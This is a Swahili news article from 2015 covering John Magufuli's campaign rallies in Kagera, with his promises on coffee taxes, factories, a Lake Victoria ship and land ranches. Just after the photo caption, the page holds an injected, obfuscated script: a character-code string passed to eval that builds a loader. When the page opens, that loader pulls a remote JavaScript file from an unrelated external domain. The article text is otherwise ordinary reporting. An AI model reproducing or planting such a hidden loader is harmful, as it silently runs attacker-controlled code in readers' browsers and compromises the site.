Recent Comments

Magufuli: Nitashughulikia bei ya kahawa

By Baraka Bitariho Sep 22, 2015
<p>Mgombea urais kwa tiketi ya CCM, Dk John Magufuli akihutubia wakazi wa Bukoba mjini mkoani Kagera kwenye viwanja vya Gymkhana katika Mkutano wa Kampeni jana (Picha na Adam Mzee) </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mgombea urais kwa tiketi ya CCM, Dk John Magufuli akihutubia wakazi wa Bukoba mjini mkoani Kagera kwenye viwanja vya Gymkhana katika Mkutano wa Kampeni jana (Picha na Adam Mzee)
Mgombea urais kwa tiketi ya CCM, Dk John Magufuli akihutubia wakazi wa Bukoba mjini mkoani Kagera kwenye viwanja vya Gymkhana katika Mkutano wa Kampeni jana (Picha na Adam Mzee)

MGOMBEA urais wa Chama Cha Mapinduzi (CCM), Dk John Magufuli ameahidi kwamba akichaguliwa, atashughulikia bei ya kahawa na kujenga viwanda mbalimbali, ikiwemo vya kahawa, samaki, chai na sukari. Magufuli amewataka wananchi wamchague na wampe miezi mitano pekee, wathibitishe uwezo wake wa kutatua kero.

Dk Magufuli alieleza kuwa anasikitishwa na uamuzi uliofanywa na waziri aliyewahi kuongoza Wizara ya Maji na Maendeleo ya Mifugo, kugawa ranchi 52 kiholela mkoani Kagera. Alisema hayo katika mikutano ya kampeni, aliyoifanya katika maeneo mbalimbali wilayani Muleba mkoa wa Kagera na mkutano mkubwa wa kampeni, alioufanya mjini Bukoba, jana.

Katika mikutano hiyo, Magufuli alielezwa na wagombea wa ubunge wa CCM juu ya kero mbalimbali, wakamuomba atakapochaguliwa kuwa rais, azivalie njuga. Miongoni mwa kero hizo ni pamoja na migogoro ya ardhi inayohusisha ranchi za taifa, tatizo la bei ya kahawa, ukosefu wa meli katika Ziwa Victoria na changamoto ya mgawanyo wa fedha kwenye halmashauri bila kuzingatia ukubwa na wingi wa watu katika maeneo husika.

“Hamuwezi kunipa hata miezi mitano muone?… nataka nitimize wajibu wangu nikiwa hai; wa kuwatumikia Watanzania. Naomba mniamini,” alisema Dk Magufuli akithibitisha kwamba ahadi zake ni za ukweli na hazitoi kwa sababu ya kuomba kura. Magufuli alisema anamuomba Mungu asije akawa kiongozi mwenye majivuno, bali atakayesimamia haki na kuwatumikia wananchi kwani yeye ni kiongozi wa Watanzania wote.

Waziri aliyebinafsisha ranchi Kuhusu suala la ranchi, mgombea ubunge wa Muleba Kaskazini, Charles Mwijage akizungumza kwenye uwanja wa Polisi mjini Kamachumu, alimwomba Dk Magufuli atakapochaguliwa atoe ufumbuzi wa malalamiko kuhusu ranchi ya Rutoro iliyoko jimboni kwake. Dk Magufuli alisema,“ Ranchi 52 za Kagera zilibinafsishwa kiajabu ajabu na aliyekuwa Waziri wa Mifugo lakini anataka wananchi wamchague,” alisema Magufuli bila kumtaja kwa jina waziri husika.

Aliendelea kusema, “Katika vitu vinavyonisumbua mimi na Rais Kikwete ni jinsi waziri wake alivyogawa ranchi vibaya.” Ingawa hakumtaja kwa jina, aliyehusika kwenye ugawaji wa ranchi hizo wakati huo alikuwa ni Edward Lowassa; aliyekuwa Waziri wa Maji na Maendeleo ya Mifugo, aliyetumikia nafasi hiyo tangu mwaka 2000 hadi 2005. Kwa mujibu wa Magufuli, mgogoro kuhusu ranchi ya Rutoro uko mikononi mwa Mkuu wa Mkoa wa Kagera, John Mongella, ambaye ameanza kuushughulikia.

Hata hivyo, Magufuli alisema lengo ni kuhakikisha kwamba ranchi hiyo inagawanywa ili eneo lingine liende kwa wananchi. Pamoja na kwamba Magufuli hakumtaja kwa jina waziri aliyehusika na ranchi, mgombea ubunge wa Muleba, Mwijage katika mkutano uliofanyika mjini Bukoba aliwataja Lowassa na Waziri Mkuu mstaafu, Frederick Sumaye kuwa ndio waliohusika kuuza ardhi ya Kagera.

Kodi za kahawa Akimjibu mgombea wa ubunge wa Bukoba Vijijini, Jasson Rweikiza aliyelalamikia wingi wa kodi kwenye zao la kahawa, Dk Magufuli aliahidi kuifanyia kazi. Alisema ikiwezekana, anataka watu wa Uganda wawe wanakuja nchini kununua kahawa tofauti na sasa ambapo zao hilo linapelekwa Uganda. Alisema si sahihi kutamka kwamba kahawa iwe inauzwa Uganda, kwani kinachotakiwa ni kutatua changamoto ikiwamo kudhibiti kodi 26 zinazosababisha wakulima kuuza kahawa yao kwa bei ya chini.

Alisema bei ya chini ya sasa ya kahawa, inatokana na utitiri wa kodi zinazofikia 26, kama vile kodi za ardhi, kodi za halmashauri na nyinginezo. Alisema akichaguliwa kuwa rais, kazi ya kwanza ya waziri wake wa kilimo na waziri wa biashara, itakuwa ni kushughulikia bei ya kahawa na mazao mengine, kama chai, sukari na samaki. Pia, Magufuli aliahidi kujenga viwanda mbalimbali na kufufua vingine.

Alisema viwanda vitasindika malighafi za mazao mbalimbali, kuongeza pato la serikali na kutoa ajira kwa Watanzania wengi. Meli Ziwa Victoria Kuhusu ukosefu wa Meli Ziwa Victoria, Magufuli alisema ilishindikana kununuliwa mara moja kutokana na vipaumbele vingine ambavyo serikali ilikuwa navyo ikiwamo ujenzi wa barabara za lami. Alihoji sababu za mawaziri wakuu, Frederick Sumaye na Edward Lowassa kushindwa kununua meli wakati huo Mv Bukoba ilipozama, badala yake wakasubiri sasa kukosoa serikali . “Kama hukuwaonea huruma jana, utawaonea huruma leo?,” alisema. “Suala la meli, nitaileta.

Hilo siyo tatizo. Nataka mniachie hii kazi. Najua ni ahadi ya rais Jakaya Kikwete. Na hii ahadi ni amri kwa sababu mimi nilikuwa waziri wa ujenzi,” alisema. Naomba wananchi msikubali mtu atumie shida zenu kuwarubuni,” alisema Dk Magufuli na kuainisha mafanikio mbalimbali ya ujenzi wa barabara za lami nchini. Alisema kama ameweza kutengeneza kilometa zote za barabara za lami, amenunua vivuko vipya zaidi ya 15 , hawezi kushindwa kununua meli mbili kwa ajili ya Ziwa Victoria.

Kuhusu mafisadi Kuhusu mafisadi na watoa rushwa, aliendelea kuahidi kuwa akishateuliwa kuwa rais, muswada utapelekwa bungeni kwa ajili ya kushughulikia mafisadi. Magufuli alisema kama kwenye mchakato wa kura za maoni, walitumia rushwa walihonga fedha, wakipata urais watashindwaje kuuza nchi. Alisema watu wanaomchukia na wasiotamani awe rais ni mafisadi na wafanyakazi wavivu, huku akiomba wasiokuwa katika kundi hilo, wampigie kura awe rais adhibiti vitendo hivyo.

Alisema watumishi wavivu pamoja na mafisadi ndiyo wanaomchukia ingawa anaamini ni wachache. Aliomba wana Kagera na Watanzania kwa ujumla, kumwombea kwa Mungu atakapochaguliwa kuwa rais, awatumikie wananchi kwa uaminifu. Magufuli alisisitiza kuwa akichaguliwa serikali yake, itakuwa rafiki wa wafanyakazi na atahakikisha maslahi ya wafanyakazi yanaboreshwa.

Alisema, mfanyakazi akipata mshahara wa kutosha wa kumwezesha kupata nyumba, hatachukua rushwa, hatanyanyasa watu wa chini bali ataipenda kazi yake. Alionya wafanyakazi wavivu kwamba hawatakuwa rafiki zake. “Wanaoingia saa mbili saa tatu na kutoka; wafanyakazi ambao kila siku wanafanya makosa siyo rafiki zangu,” alisema. Aliendelea kusema, “Unaharibu Bukoba kwa kufanya makosa unataka uhamishiwe Biharamulo,” alisema na kusisitiza kuwa mfanyakazi akiharibu itakuwa imekwisha.

Magufuli alisema wafanyakazi hao ambao ni wachache wenye mwelekeo huo, hawawezi kumpenda . “Nasema kwa dhati ni vizuri tujenge nidhamu,” alisema na kusisitiza kuwa hatua hiyo itaepusha kukatisha tamaa wafanyakazi wengi walio wazuri ambao hukatishwa tamaa na wachache. Magufuli alisisitiza kuwa serikali yake itakuwa rafiki kwa wafanyabiashara ndogondogo na wakulima. “Nataka tujenge taifa la watu wenye upendo…kila mtu ana jukumu la kufanya kazi na kupata malipo yake halali,” alisema.

Alieleza kushangazwa na baadhi ya watu ambao wamewahi kushika madaraka makubwa serikalini wakidai kwamba hakuna, kitu kilichofanyika katika suala la maendeleo. Alisema amekaa serikalini akiwa waziri hivyo anafahamu na ndiyo maana ameomba urais. “Na bahati nzuri jina langu ni Magufuli mnafahamu kazi ya kufuli kwenye nyumba zenu…nitakapokuwa rais nitawafunga kweli makufuli wasifilisi nchi,” alisema. Alisisitiza kuwa Tanzania ni tajiri yenye madini.

Alitoa mfano wa Kagera kwamba ina madini ya bati na haoni sababu ya kutokuwa na kiwanda cha bati. Baada ya kutembelea majimbo ya Muleba Kusini, Muleba Kaskazini, Bukoba Mjini na Bukoba Vijijini, leo Dk Magufuli anaendelea na ziara zake katika majimbo mengine mkoani Kagera.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com